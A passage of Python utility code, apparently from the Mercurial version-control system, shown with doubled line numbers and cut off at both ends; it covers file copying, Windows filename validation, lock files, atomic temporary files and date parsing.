1246 1246 shutil.copystat(src, dest)
1247 1247 else:
1248 1248 shutil.copymode(src, dest)
1249 1249 if oldstat and oldstat.stat:
1250 1250 newstat = filestat.frompath(dest)
1251 1251 if newstat.isambig(oldstat):
1252 1252 # stat of copied file is ambiguous to original one
1253 1253 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1254 1254 os.utime(dest, (advanced, advanced))
1255 1255 except shutil.Error as inst:
1256 1256 raise Abort(str(inst))
1257 1257
1258 1258 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1259 1259 """Copy a directory tree using hardlinks if possible."""
1260 1260 num = 0
1261 1261
1262 1262 gettopic = lambda: hardlink and _('linking') or _('copying')
1263 1263
1264 1264 if os.path.isdir(src):
1265 1265 if hardlink is None:
1266 1266 hardlink = (os.stat(src).st_dev ==
1267 1267 os.stat(os.path.dirname(dst)).st_dev)
1268 1268 topic = gettopic()
1269 1269 os.mkdir(dst)
1270 1270 for name, kind in listdir(src):
1271 1271 srcname = os.path.join(src, name)
1272 1272 dstname = os.path.join(dst, name)
1273 1273 def nprog(t, pos):
1274 1274 if pos is not None:
1275 1275 return progress(t, pos + num)
1276 1276 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1277 1277 num += n
1278 1278 else:
1279 1279 if hardlink is None:
1280 1280 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1281 1281 os.stat(os.path.dirname(dst)).st_dev)
1282 1282 topic = gettopic()
1283 1283
1284 1284 if hardlink:
1285 1285 try:
1286 1286 oslink(src, dst)
1287 1287 except (IOError, OSError):
1288 1288 hardlink = False
1289 1289 shutil.copy(src, dst)
1290 1290 else:
1291 1291 shutil.copy(src, dst)
1292 1292 num += 1
1293 1293 progress(topic, num)
1294 1294 progress(topic, None)
1295 1295
1296 1296 return hardlink, num
1297 1297
1298 1298 _winreservednames = {
1299 1299 'con', 'prn', 'aux', 'nul',
1300 1300 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1301 1301 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1302 1302 }
1303 1303 _winreservedchars = ':*?"<>|'
1304 1304 def checkwinfilename(path):
1305 1305 r'''Check that the base-relative path is a valid filename on Windows.
1306 1306 Returns None if the path is ok, or a UI string describing the problem.
1307 1307
1308 1308 >>> checkwinfilename(b"just/a/normal/path")
1309 1309 >>> checkwinfilename(b"foo/bar/con.xml")
1310 1310 "filename contains 'con', which is reserved on Windows"
1311 1311 >>> checkwinfilename(b"foo/con.xml/bar")
1312 1312 "filename contains 'con', which is reserved on Windows"
1313 1313 >>> checkwinfilename(b"foo/bar/xml.con")
1314 1314 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1315 1315 "filename contains 'AUX', which is reserved on Windows"
1316 1316 >>> checkwinfilename(b"foo/bar/bla:.txt")
1317 1317 "filename contains ':', which is reserved on Windows"
1318 1318 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1319 1319 "filename contains '\\x07', which is invalid on Windows"
1320 1320 >>> checkwinfilename(b"foo/bar/bla ")
1321 1321 "filename ends with ' ', which is not allowed on Windows"
1322 1322 >>> checkwinfilename(b"../bar")
1323 1323 >>> checkwinfilename(b"foo\\")
1324 1324 "filename ends with '\\', which is invalid on Windows"
1325 1325 >>> checkwinfilename(b"foo\\/bar")
1326 1326 "directory name ends with '\\', which is invalid on Windows"
1327 1327 '''
1328 1328 if path.endswith('\\'):
1329 1329 return _("filename ends with '\\', which is invalid on Windows")
1330 1330 if '\\/' in path:
1331 1331 return _("directory name ends with '\\', which is invalid on Windows")
1332 1332 for n in path.replace('\\', '/').split('/'):
1333 1333 if not n:
1334 1334 continue
1335 1335 for c in _filenamebytestr(n):
1336 1336 if c in _winreservedchars:
1337 1337 return _("filename contains '%s', which is reserved "
1338 1338 "on Windows") % c
1339 1339 if ord(c) <= 31:
1340 1340 return _("filename contains '%s', which is invalid "
1341 1341 "on Windows") % escapestr(c)
1342 1342 base = n.split('.')[0]
1343 1343 if base and base.lower() in _winreservednames:
1344 1344 return _("filename contains '%s', which is reserved "
1345 1345 "on Windows") % base
1346 1346 t = n[-1:]
1347 1347 if t in '. ' and n not in '..':
1348 1348 return _("filename ends with '%s', which is not allowed "
1349 1349 "on Windows") % t
1350 1350
1351 1351 if pycompat.iswindows:
1352 1352 checkosfilename = checkwinfilename
1353 1353 timer = time.clock
1354 1354 else:
1355 1355 checkosfilename = platform.checkosfilename
1356 1356 timer = time.time
1357 1357
1358 1358 if safehasattr(time, "perf_counter"):
1359 1359 timer = time.perf_counter
1360 1360
1361 1361 def makelock(info, pathname):
1362 1362 try:
1363 1363 return os.symlink(info, pathname)
1364 1364 except OSError as why:
1365 1365 if why.errno == errno.EEXIST:
1366 1366 raise
1367 1367 except AttributeError: # no symlink in os
1368 1368 pass
1369 1369
1370 1370 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1371 1371 os.write(ld, info)
1372 1372 os.close(ld)
1373 1373
1374 1374 def readlock(pathname):
1375 1375 try:
1376 1376 return os.readlink(pathname)
1377 1377 except OSError as why:
1378 1378 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1379 1379 raise
1380 1380 except AttributeError: # no symlink in os
1381 1381 pass
1382 1382 fp = posixfile(pathname)
1383 1383 r = fp.read()
1384 1384 fp.close()
1385 1385 return r
1386 1386
1387 1387 def fstat(fp):
1388 1388 '''stat file object that may not have fileno method.'''
1389 1389 try:
1390 1390 return os.fstat(fp.fileno())
1391 1391 except AttributeError:
1392 1392 return os.stat(fp.name)
1393 1393
1394 1394 # File system features
1395 1395
1396 1396 def fscasesensitive(path):
1397 1397 """
1398 1398 Return true if the given path is on a case-sensitive filesystem
1399 1399
1400 1400 Requires a path (like /foo/.hg) ending with a foldable final
1401 1401 directory component.
1402 1402 """
1403 1403 s1 = os.lstat(path)
1404 1404 d, b = os.path.split(path)
1405 1405 b2 = b.upper()
1406 1406 if b == b2:
1407 1407 b2 = b.lower()
1408 1408 if b == b2:
1409 1409 return True # no evidence against case sensitivity
1410 1410 p2 = os.path.join(d, b2)
1411 1411 try:
1412 1412 s2 = os.lstat(p2)
1413 1413 if s2 == s1:
1414 1414 return False
1415 1415 return True
1416 1416 except OSError:
1417 1417 return True
1418 1418
1419 1419 try:
1420 1420 import re2
1421 1421 _re2 = None
1422 1422 except ImportError:
1423 1423 _re2 = False
1424 1424
1425 1425 class _re(object):
1426 1426 def _checkre2(self):
1427 1427 global _re2
1428 1428 try:
1429 1429 # check if match works, see issue3964
1430 1430 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1431 1431 except ImportError:
1432 1432 _re2 = False
1433 1433
1434 1434 def compile(self, pat, flags=0):
1435 1435 '''Compile a regular expression, using re2 if possible
1436 1436
1437 1437 For best performance, use only re2-compatible regexp features. The
1438 1438 only flags from the re module that are re2-compatible are
1439 1439 IGNORECASE and MULTILINE.'''
1440 1440 if _re2 is None:
1441 1441 self._checkre2()
1442 1442 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1443 1443 if flags & remod.IGNORECASE:
1444 1444 pat = '(?i)' + pat
1445 1445 if flags & remod.MULTILINE:
1446 1446 pat = '(?m)' + pat
1447 1447 try:
1448 1448 return re2.compile(pat)
1449 1449 except re2.error:
1450 1450 pass
1451 1451 return remod.compile(pat, flags)
1452 1452
1453 1453 @propertycache
1454 1454 def escape(self):
1455 1455 '''Return the version of escape corresponding to self.compile.
1456 1456
1457 1457 This is imperfect because whether re2 or re is used for a particular
1458 1458 function depends on the flags, etc, but it's the best we can do.
1459 1459 '''
1460 1460 global _re2
1461 1461 if _re2 is None:
1462 1462 self._checkre2()
1463 1463 if _re2:
1464 1464 return re2.escape
1465 1465 else:
1466 1466 return remod.escape
1467 1467
1468 1468 re = _re()
1469 1469
1470 1470 _fspathcache = {}
1471 1471 def fspath(name, root):
1472 1472 '''Get name in the case stored in the filesystem
1473 1473
1474 1474 The name should be relative to root, and be normcase-ed for efficiency.
1475 1475
1476 1476 Note that this function is unnecessary, and should not be
1477 1477 called, for case-sensitive filesystems (simply because it's expensive).
1478 1478
1479 1479 The root should be normcase-ed, too.
1480 1480 '''
1481 1481 def _makefspathcacheentry(dir):
1482 1482 return dict((normcase(n), n) for n in os.listdir(dir))
1483 1483
1484 1484 seps = pycompat.ossep
1485 1485 if pycompat.osaltsep:
1486 1486 seps = seps + pycompat.osaltsep
1487 1487 # Protect backslashes. This gets silly very quickly.
1488 1488 seps.replace('\\','\\\\')
1489 1489 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1490 1490 dir = os.path.normpath(root)
1491 1491 result = []
1492 1492 for part, sep in pattern.findall(name):
1493 1493 if sep:
1494 1494 result.append(sep)
1495 1495 continue
1496 1496
1497 1497 if dir not in _fspathcache:
1498 1498 _fspathcache[dir] = _makefspathcacheentry(dir)
1499 1499 contents = _fspathcache[dir]
1500 1500
1501 1501 found = contents.get(part)
1502 1502 if not found:
1503 1503 # retry "once per directory" per "dirstate.walk" which
1504 1504 # may take place for each patches of "hg qpush", for example
1505 1505 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1506 1506 found = contents.get(part)
1507 1507
1508 1508 result.append(found or part)
1509 1509 dir = os.path.join(dir, part)
1510 1510
1511 1511 return ''.join(result)
1512 1512
1513 1513 def getfstype(dirpath):
1514 1514 '''Get the filesystem type name from a directory (best-effort)
1515 1515
1516 1516 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1517 1517 '''
1518 1518 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1519 1519
1520 1520 def checknlink(testfile):
1521 1521 '''check whether hardlink count reporting works properly'''
1522 1522
1523 1523 # testfile may be open, so we need a separate file for checking to
1524 1524 # work around issue2543 (or testfile may get lost on Samba shares)
1525 1525 f1, f2, fp = None, None, None
1526 1526 try:
1527 1527 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1528 1528 suffix='1~', dir=os.path.dirname(testfile))
1529 1529 os.close(fd)
1530 1530 f2 = '%s2~' % f1[:-2]
1531 1531
1532 1532 oslink(f1, f2)
1533 1533 # nlinks() may behave differently for files on Windows shares if
1534 1534 # the file is open.
1535 1535 fp = posixfile(f2)
1536 1536 return nlinks(f2) > 1
1537 1537 except OSError:
1538 1538 return False
1539 1539 finally:
1540 1540 if fp is not None:
1541 1541 fp.close()
1542 1542 for f in (f1, f2):
1543 1543 try:
1544 1544 if f is not None:
1545 1545 os.unlink(f)
1546 1546 except OSError:
1547 1547 pass
1548 1548
1549 1549 def endswithsep(path):
1550 1550 '''Check path ends with os.sep or os.altsep.'''
1551 1551 return (path.endswith(pycompat.ossep)
1552 1552 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1553 1553
1554 1554 def splitpath(path):
1555 1555 '''Split path by os.sep.
1556 1556 Note that this function does not use os.altsep because this is
1557 1557 an alternative of simple "xxx.split(os.sep)".
1558 1558 It is recommended to use os.path.normpath() before using this
1559 1559 function if need.'''
1560 1560 return path.split(pycompat.ossep)
1561 1561
1562 1562 def gui():
1563 1563 '''Are we running in a GUI?'''
1564 1564 if pycompat.sysplatform == 'darwin':
1565 1565 if 'SSH_CONNECTION' in encoding.environ:
1566 1566 # handle SSH access to a box where the user is logged in
1567 1567 return False
1568 1568 elif getattr(osutil, 'isgui', None):
1569 1569 # check if a CoreGraphics session is available
1570 1570 return osutil.isgui()
1571 1571 else:
1572 1572 # pure build; use a safe default
1573 1573 return True
1574 1574 else:
1575 1575 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1576 1576
1577 1577 def mktempcopy(name, emptyok=False, createmode=None):
1578 1578 """Create a temporary file with the same contents from name
1579 1579
1580 1580 The permission bits are copied from the original file.
1581 1581
1582 1582 If the temporary file is going to be truncated immediately, you
1583 1583 can use emptyok=True as an optimization.
1584 1584
1585 1585 Returns the name of the temporary file.
1586 1586 """
1587 1587 d, fn = os.path.split(name)
1588 1588 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1589 1589 os.close(fd)
1590 1590 # Temporary files are created with mode 0600, which is usually not
1591 1591 # what we want. If the original file already exists, just copy
1592 1592 # its mode. Otherwise, manually obey umask.
1593 1593 copymode(name, temp, createmode)
1594 1594 if emptyok:
1595 1595 return temp
1596 1596 try:
1597 1597 try:
1598 1598 ifp = posixfile(name, "rb")
1599 1599 except IOError as inst:
1600 1600 if inst.errno == errno.ENOENT:
1601 1601 return temp
1602 1602 if not getattr(inst, 'filename', None):
1603 1603 inst.filename = name
1604 1604 raise
1605 1605 ofp = posixfile(temp, "wb")
1606 1606 for chunk in filechunkiter(ifp):
1607 1607 ofp.write(chunk)
1608 1608 ifp.close()
1609 1609 ofp.close()
1610 1610 except: # re-raises
1611 1611 try:
1612 1612 os.unlink(temp)
1613 1613 except OSError:
1614 1614 pass
1615 1615 raise
1616 1616 return temp
1617 1617
1618 1618 class filestat(object):
1619 1619 """help to exactly detect change of a file
1620 1620
1621 1621 'stat' attribute is result of 'os.stat()' if specified 'path'
1622 1622 exists. Otherwise, it is None. This can avoid preparative
1623 1623 'exists()' examination on client side of this class.
1624 1624 """
1625 1625 def __init__(self, stat):
1626 1626 self.stat = stat
1627 1627
1628 1628 @classmethod
1629 1629 def frompath(cls, path):
1630 1630 try:
1631 1631 stat = os.stat(path)
1632 1632 except OSError as err:
1633 1633 if err.errno != errno.ENOENT:
1634 1634 raise
1635 1635 stat = None
1636 1636 return cls(stat)
1637 1637
1638 1638 @classmethod
1639 1639 def fromfp(cls, fp):
1640 1640 stat = os.fstat(fp.fileno())
1641 1641 return cls(stat)
1642 1642
1643 1643 __hash__ = object.__hash__
1644 1644
1645 1645 def __eq__(self, old):
1646 1646 try:
1647 1647 # if ambiguity between stat of new and old file is
1648 1648 # avoided, comparison of size, ctime and mtime is enough
1649 1649 # to exactly detect change of a file regardless of platform
1650 1650 return (self.stat.st_size == old.stat.st_size and
1651 1651 self.stat.st_ctime == old.stat.st_ctime and
1652 1652 self.stat.st_mtime == old.stat.st_mtime)
1653 1653 except AttributeError:
1654 1654 pass
1655 1655 try:
1656 1656 return self.stat is None and old.stat is None
1657 1657 except AttributeError:
1658 1658 return False
1659 1659
1660 1660 def isambig(self, old):
1661 1661 """Examine whether new (= self) stat is ambiguous against old one
1662 1662
1663 1663 "S[N]" below means stat of a file at N-th change:
1664 1664
1665 1665 - S[n-1].ctime < S[n].ctime: can detect change of a file
1666 1666 - S[n-1].ctime == S[n].ctime
1667 1667 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1668 1668 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1669 1669 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1670 1670 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1671 1671
1672 1672 Case (*2) above means that a file was changed twice or more at
1673 1673 same time in sec (= S[n-1].ctime), and comparison of timestamp
1674 1674 is ambiguous.
1675 1675
1676 1676 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1677 1677 timestamp is ambiguous".
1678 1678
1679 1679 But advancing mtime only in case (*2) doesn't work as
1680 1680 expected, because naturally advanced S[n].mtime in case (*1)
1681 1681 might be equal to manually advanced S[n-1 or earlier].mtime.
1682 1682
1683 1683 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1684 1684 treated as ambiguous regardless of mtime, to avoid overlooking
1685 1685 by confliction between such mtime.
1686 1686
1687 1687 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1688 1688 S[n].mtime", even if size of a file isn't changed.
1689 1689 """
1690 1690 try:
1691 1691 return (self.stat.st_ctime == old.stat.st_ctime)
1692 1692 except AttributeError:
1693 1693 return False
1694 1694
1695 1695 def avoidambig(self, path, old):
1696 1696 """Change file stat of specified path to avoid ambiguity
1697 1697
1698 1698 'old' should be previous filestat of 'path'.
1699 1699
1700 1700 This skips avoiding ambiguity, if a process doesn't have
1701 1701 appropriate privileges for 'path'. This returns False in this
1702 1702 case.
1703 1703
1704 1704 Otherwise, this returns True, as "ambiguity is avoided".
1705 1705 """
1706 1706 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1707 1707 try:
1708 1708 os.utime(path, (advanced, advanced))
1709 1709 except OSError as inst:
1710 1710 if inst.errno == errno.EPERM:
1711 1711 # utime() on the file created by another user causes EPERM,
1712 1712 # if a process doesn't have appropriate privileges
1713 1713 return False
1714 1714 raise
1715 1715 return True
1716 1716
1717 1717 def __ne__(self, other):
1718 1718 return not self == other
1719 1719
1720 1720 class atomictempfile(object):
1721 1721 '''writable file object that atomically updates a file
1722 1722
1723 1723 All writes will go to a temporary copy of the original file. Call
1724 1724 close() when you are done writing, and atomictempfile will rename
1725 1725 the temporary copy to the original name, making the changes
1726 1726 visible. If the object is destroyed without being closed, all your
1727 1727 writes are discarded.
1728 1728
1729 1729 checkambig argument of constructor is used with filestat, and is
1730 1730 useful only if target file is guarded by any lock (e.g. repo.lock
1731 1731 or repo.wlock).
1732 1732 '''
1733 1733 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1734 1734 self.__name = name # permanent name
1735 1735 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1736 1736 createmode=createmode)
1737 1737 self._fp = posixfile(self._tempname, mode)
1738 1738 self._checkambig = checkambig
1739 1739
1740 1740 # delegated methods
1741 1741 self.read = self._fp.read
1742 1742 self.write = self._fp.write
1743 1743 self.seek = self._fp.seek
1744 1744 self.tell = self._fp.tell
1745 1745 self.fileno = self._fp.fileno
1746 1746
1747 1747 def close(self):
1748 1748 if not self._fp.closed:
1749 1749 self._fp.close()
1750 1750 filename = localpath(self.__name)
1751 1751 oldstat = self._checkambig and filestat.frompath(filename)
1752 1752 if oldstat and oldstat.stat:
1753 1753 rename(self._tempname, filename)
1754 1754 newstat = filestat.frompath(filename)
1755 1755 if newstat.isambig(oldstat):
1756 1756 # stat of changed file is ambiguous to original one
1757 1757 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1758 1758 os.utime(filename, (advanced, advanced))
1759 1759 else:
1760 1760 rename(self._tempname, filename)
1761 1761
1762 1762 def discard(self):
1763 1763 if not self._fp.closed:
1764 1764 try:
1765 1765 os.unlink(self._tempname)
1766 1766 except OSError:
1767 1767 pass
1768 1768 self._fp.close()
1769 1769
1770 1770 def __del__(self):
1771 1771 if safehasattr(self, '_fp'): # constructor actually did something
1772 1772 self.discard()
1773 1773
1774 1774 def __enter__(self):
1775 1775 return self
1776 1776
1777 1777 def __exit__(self, exctype, excvalue, traceback):
1778 1778 if exctype is not None:
1779 1779 self.discard()
1780 1780 else:
1781 1781 self.close()
1782 1782
1783 1783 def unlinkpath(f, ignoremissing=False):
1784 1784 """unlink and remove the directory if it is empty"""
1785 1785 if ignoremissing:
1786 1786 tryunlink(f)
1787 1787 else:
1788 1788 unlink(f)
1789 1789 # try removing directories that might now be empty
1790 1790 try:
1791 1791 removedirs(os.path.dirname(f))
1792 1792 except OSError:
1793 1793 pass
1794 1794
1795 1795 def tryunlink(f):
1796 1796 """Attempt to remove a file, ignoring ENOENT errors."""
1797 1797 try:
1798 1798 unlink(f)
1799 1799 except OSError as e:
1800 1800 if e.errno != errno.ENOENT:
1801 1801 raise
1802 1802
1803 1803 def makedirs(name, mode=None, notindexed=False):
1804 1804 """recursive directory creation with parent mode inheritance
1805 1805
1806 1806 Newly created directories are marked as "not to be indexed by
1807 1807 the content indexing service", if ``notindexed`` is specified
1808 1808 for "write" mode access.
1809 1809 """
1810 1810 try:
1811 1811 makedir(name, notindexed)
1812 1812 except OSError as err:
1813 1813 if err.errno == errno.EEXIST:
1814 1814 return
1815 1815 if err.errno != errno.ENOENT or not name:
1816 1816 raise
1817 1817 parent = os.path.dirname(os.path.abspath(name))
1818 1818 if parent == name:
1819 1819 raise
1820 1820 makedirs(parent, mode, notindexed)
1821 1821 try:
1822 1822 makedir(name, notindexed)
1823 1823 except OSError as err:
1824 1824 # Catch EEXIST to handle races
1825 1825 if err.errno == errno.EEXIST:
1826 1826 return
1827 1827 raise
1828 1828 if mode is not None:
1829 1829 os.chmod(name, mode)
1830 1830
1831 1831 def readfile(path):
1832 1832 with open(path, 'rb') as fp:
1833 1833 return fp.read()
1834 1834
1835 1835 def writefile(path, text):
1836 1836 with open(path, 'wb') as fp:
1837 1837 fp.write(text)
1838 1838
1839 1839 def appendfile(path, text):
1840 1840 with open(path, 'ab') as fp:
1841 1841 fp.write(text)
1842 1842
1843 1843 class chunkbuffer(object):
1844 1844 """Allow arbitrary sized chunks of data to be efficiently read from an
1845 1845 iterator over chunks of arbitrary size."""
1846 1846
1847 1847 def __init__(self, in_iter):
1848 1848 """in_iter is the iterator that's iterating over the input chunks."""
1849 1849 def splitbig(chunks):
1850 1850 for chunk in chunks:
1851 1851 if len(chunk) > 2**20:
1852 1852 pos = 0
1853 1853 while pos < len(chunk):
1854 1854 end = pos + 2 ** 18
1855 1855 yield chunk[pos:end]
1856 1856 pos = end
1857 1857 else:
1858 1858 yield chunk
1859 1859 self.iter = splitbig(in_iter)
1860 1860 self._queue = collections.deque()
1861 1861 self._chunkoffset = 0
1862 1862
1863 1863 def read(self, l=None):
1864 1864 """Read L bytes of data from the iterator of chunks of data.
1865 1865 Returns less than L bytes if the iterator runs dry.
1866 1866
1867 1867 If size parameter is omitted, read everything"""
1868 1868 if l is None:
1869 1869 return ''.join(self.iter)
1870 1870
1871 1871 left = l
1872 1872 buf = []
1873 1873 queue = self._queue
1874 1874 while left > 0:
1875 1875 # refill the queue
1876 1876 if not queue:
1877 1877 target = 2**18
1878 1878 for chunk in self.iter:
1879 1879 queue.append(chunk)
1880 1880 target -= len(chunk)
1881 1881 if target <= 0:
1882 1882 break
1883 1883 if not queue:
1884 1884 break
1885 1885
1886 1886 # The easy way to do this would be to queue.popleft(), modify the
1887 1887 # chunk (if necessary), then queue.appendleft(). However, for cases
1888 1888 # where we read partial chunk content, this incurs 2 dequeue
1889 1889 # mutations and creates a new str for the remaining chunk in the
1890 1890 # queue. Our code below avoids this overhead.
1891 1891
1892 1892 chunk = queue[0]
1893 1893 chunkl = len(chunk)
1894 1894 offset = self._chunkoffset
1895 1895
1896 1896 # Use full chunk.
1897 1897 if offset == 0 and left >= chunkl:
1898 1898 left -= chunkl
1899 1899 queue.popleft()
1900 1900 buf.append(chunk)
1901 1901 # self._chunkoffset remains at 0.
1902 1902 continue
1903 1903
1904 1904 chunkremaining = chunkl - offset
1905 1905
1906 1906 # Use all of unconsumed part of chunk.
1907 1907 if left >= chunkremaining:
1908 1908 left -= chunkremaining
1909 1909 queue.popleft()
1910 1910 # offset == 0 is enabled by block above, so this won't merely
1911 1911 # copy via ``chunk[0:]``.
1912 1912 buf.append(chunk[offset:])
1913 1913 self._chunkoffset = 0
1914 1914
1915 1915 # Partial chunk needed.
1916 1916 else:
1917 1917 buf.append(chunk[offset:offset + left])
1918 1918 self._chunkoffset += left
1919 1919 left -= chunkremaining
1920 1920
1921 1921 return ''.join(buf)
1922 1922
1923 1923 def filechunkiter(f, size=131072, limit=None):
1924 1924 """Create a generator that produces the data in the file size
1925 1925 (default 131072) bytes at a time, up to optional limit (default is
1926 1926 to read all data). Chunks may be less than size bytes if the
1927 1927 chunk is the last chunk in the file, or the file is a socket or
1928 1928 some other type of file that sometimes reads less data than is
1929 1929 requested."""
1930 1930 assert size >= 0
1931 1931 assert limit is None or limit >= 0
1932 1932 while True:
1933 1933 if limit is None:
1934 1934 nbytes = size
1935 1935 else:
1936 1936 nbytes = min(limit, size)
1937 1937 s = nbytes and f.read(nbytes)
1938 1938 if not s:
1939 1939 break
1940 1940 if limit:
1941 1941 limit -= len(s)
1942 1942 yield s
1943 1943
1944 1944 def makedate(timestamp=None):
1945 1945 '''Return a unix timestamp (or the current time) as a (unixtime,
1946 1946 offset) tuple based off the local timezone.'''
1947 1947 if timestamp is None:
1948 1948 timestamp = time.time()
1949 1949 if timestamp < 0:
1950 1950 hint = _("check your clock")
1951 1951 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1952 1952 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1953 1953 datetime.datetime.fromtimestamp(timestamp))
1954 1954 tz = delta.days * 86400 + delta.seconds
1955 1955 return timestamp, tz
1956 1956
1957 1957 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1958 1958 """represent a (unixtime, offset) tuple as a localized time.
1959 1959 unixtime is seconds since the epoch, and offset is the time zone's
1960 1960 number of seconds away from UTC.
1961 1961
1962 1962 >>> datestr((0, 0))
1963 1963 'Thu Jan 01 00:00:00 1970 +0000'
1964 1964 >>> datestr((42, 0))
1965 1965 'Thu Jan 01 00:00:42 1970 +0000'
1966 1966 >>> datestr((-42, 0))
1967 1967 'Wed Dec 31 23:59:18 1969 +0000'
1968 1968 >>> datestr((0x7fffffff, 0))
1969 1969 'Tue Jan 19 03:14:07 2038 +0000'
1970 1970 >>> datestr((-0x80000000, 0))
1971 1971 'Fri Dec 13 20:45:52 1901 +0000'
1972 1972 """
1973 1973 t, tz = date or makedate()
1974 1974 if "%1" in format or "%2" in format or "%z" in format:
1975 1975 sign = (tz > 0) and "-" or "+"
1976 1976 minutes = abs(tz) // 60
1977 1977 q, r = divmod(minutes, 60)
1978 1978 format = format.replace("%z", "%1%2")
1979 1979 format = format.replace("%1", "%c%02d" % (sign, q))
1980 1980 format = format.replace("%2", "%02d" % r)
1981 1981 d = t - tz
1982 1982 if d > 0x7fffffff:
1983 1983 d = 0x7fffffff
1984 1984 elif d < -0x80000000:
1985 1985 d = -0x80000000
1986 1986 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1987 1987 # because they use the gmtime() system call which is buggy on Windows
1988 1988 # for negative values.
1989 1989 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1990 1990 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1991 1991 return s
1992 1992
1993 1993 def shortdate(date=None):
1994 1994 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1995 1995 return datestr(date, format='%Y-%m-%d')
1996 1996
1997 1997 def parsetimezone(s):
1998 1998 """find a trailing timezone, if any, in string, and return a
1999 1999 (offset, remainder) pair"""
2000 2000
2001 2001 if s.endswith("GMT") or s.endswith("UTC"):
2002 2002 return 0, s[:-3].rstrip()
2003 2003
2004 2004 # Unix-style timezones [+-]hhmm
2005 2005 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2006 2006 sign = (s[-5] == "+") and 1 or -1
2007 2007 hours = int(s[-4:-2])
2008 2008 minutes = int(s[-2:])
2009 2009 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2010 2010
2011 2011 # ISO8601 trailing Z
2012 2012 if s.endswith("Z") and s[-2:-1].isdigit():
2013 2013 return 0, s[:-1]
2014 2014
2015 2015 # ISO8601-style [+-]hh:mm
2016 2016 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2017 2017 s[-5:-3].isdigit() and s[-2:].isdigit()):
2018 2018 sign = (s[-6] == "+") and 1 or -1
2019 2019 hours = int(s[-5:-3])
2020 2020 minutes = int(s[-2:])
2021 2021 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2022 2022
2023 2023 return None, s
2024 2024
2025 2025 def strdate(string, format, defaults=None):
2026 2026 """parse a localized time string and return a (unixtime, offset) tuple.
2027 2027 if the string cannot be parsed, ValueError is raised."""
2028 2028 if defaults is None:
2029 2029 defaults = {}
2030 2030
2031 2031 # NOTE: unixtime = localunixtime + offset
2032 2032 offset, date = parsetimezone(string)
2033 2033
2034 2034 # add missing elements from defaults
2035 2035 usenow = False # default to using biased defaults
2036 2036 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2037 2037 part = pycompat.bytestr(part)
2038 2038 found = [True for p in part if ("%"+p) in format]
2039 2039 if not found:
2040 2040 date += "@" + defaults[part][usenow]
2041 2041 format += "@%" + part[0]
2042 2042 else:
2043 2043 # We've found a specific time element, less specific time
2044 2044 # elements are relative to today
2045 2045 usenow = True
2046 2046
2047 2047 timetuple = time.strptime(encoding.strfromlocal(date),
2048 2048 encoding.strfromlocal(format))
2049 2049 localunixtime = int(calendar.timegm(timetuple))
2050 2050 if offset is None:
2051 2051 # local timezone
2052 2052 unixtime = int(time.mktime(timetuple))
2053 2053 offset = unixtime - localunixtime
2054 2054 else:
2055 2055 unixtime = localunixtime + offset
2056 2056 return unixtime, offset
2057 2057
2058 2058 def parsedate(date, formats=None, bias=None):
2059 2059 """parse a localized date/time and return a (unixtime, offset) tuple.
2060 2060
2061 2061 The date may be a "unixtime offset" string or in one of the specified
2062 2062 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2063 2063
2064 2064 >>> parsedate(b' today ') == parsedate(
2065 2065 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2066 2066 True
2067 2067 >>> parsedate(b'yesterday ') == parsedate(
2068 2068 ... (datetime.date.today() - datetime.timedelta(days=1)
2069 2069 ... ).strftime('%b %d').encode('ascii'))
2070 2070 True
2071 2071 >>> now, tz = makedate()
2072 2072 >>> strnow, strtz = parsedate(b'now')
2073 2073 >>> (strnow - now) < 1
2074 2074 True
2075 2075 >>> tz == strtz
2076 2076 True
2077 2077 """
2078 2078 if bias is None:
2079 2079 bias = {}
2080 2080 if not date:
2081 2081 return 0, 0
2082 2082 if isinstance(date, tuple) and len(date) == 2:
2083 2083 return date
2084 2084 if not formats:
2085 2085 formats = defaultdateformats
2086 2086 date = date.strip()
2087 2087
